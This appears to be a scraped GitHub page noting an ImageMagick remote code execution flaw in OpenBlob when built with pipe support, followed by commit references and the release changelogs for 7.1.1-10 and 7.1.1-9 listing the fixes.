A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured.

**Comments**

urban-warrior pushed a commit to ImageMagick/ImageMagick6 that referenced this issue

May 18, 2023

dlemstra added a commit that referenced this issue

May 18, 2023

dlemstra added a commit to ImageMagick/ImageMagick6 that referenced this issue

May 18, 2023

netbsd-srcmastr pushed a commit to NetBSD/pkgsrc that referenced this issue

May 21, 2023

7.1.1-10 - 2023-05-21

Commits

    beta release e31343f
    carefully crafted image files (TIM2, JPEG) no longer overflow buffer nor use heap after free (thanks to Juzhi Lu, Zhen Zhou, Likang Luo of NSFOCUS Security Team) 1061db7
    cosmetic bbf3966
    Tweaks to devcontainer to also make it possible to run it locally dfb0b6e
    Switch to regular Ubuntu image instead. b1ea9fe
    Make sure options are properly quoted to resolve the issue reported in #6338. d31c80d
    Mark argument as unused. 43e2cb6
    possible RCE vulnerability (ImageMagick/ImageMagick#6339) 17c4859
    properly cast double to size\_t (ImageMagick/ImageMagick#6341) 3d6d98d
    cosmetic 8ce0403
    Fixed MSYS2 build error. f9c9da1
    Forgot to save file before commit. 7566fdd
    Reverted the patch of ImageMagick/ImageMagick#6339. 99b72d8
    add caution when enabling pipe support 1ff6dd4
    eliminate compiler warning 4873197
    do not initialize structures on stack 7c7d2fd
    Use memset to initialize structures. 68148d5
    incompatible function pointer types passing (ImageMagick/ImageMagick#6347) 2fbf938
    Fixed Windows build. 3b5d986
    release fa1d7e6

7.1.1-9 - 2023-05-14

Merged

    Add support for Oklab #6309

Commits

    beta release 0bb7454
    Code cleanup of the fuzzers and silence warnings. d636ff4
    update autoconf configuration file 699085f
    framework for magick cache repository coder 46fe429
    support digital media repository 0a439ab
    check for NaN values c5762cc
    alpha release of the digital media repository coder 1b82a1d
    eliminate memory leak 514070c
    bump minimum MagickCache version 6f00ac4
    get the width of the main channel d4ac19b
    Use autoreconf -fiv instead. fb1e259
    support meta resource type be401fb
    The libheif project switched to cmake. 6b76461
    account for # channels in image 402c32d
    Try to add libde265 to the linking to fix the fuzz build. 7410474
    ensure blob and meta resource type can make a round trip 3797114
    only clone resource image, not blob or meta 7a63f55
    Revert changes. f8feb2e
    Corrected linker flags. 3a1ce45
    No longer use HOST\_FILLORDER but force the user to specify it when they don't want LSB byte order (#6300). 937d3dd
    Tiny optimization. ac48d89
    Code style changes. 783a78f
    log gamma 0cf104a
    rename Oklab to OkLab eb44114
    revert afb52e3
    cosmetic d35b2ab
    don't default grayscale to paletted for PNG (ImageMagick/ImageMagick#6314) ac5f29e
    release 776a88d

Search

lenovo warranty check/lookup | check warranty status | lenovo support us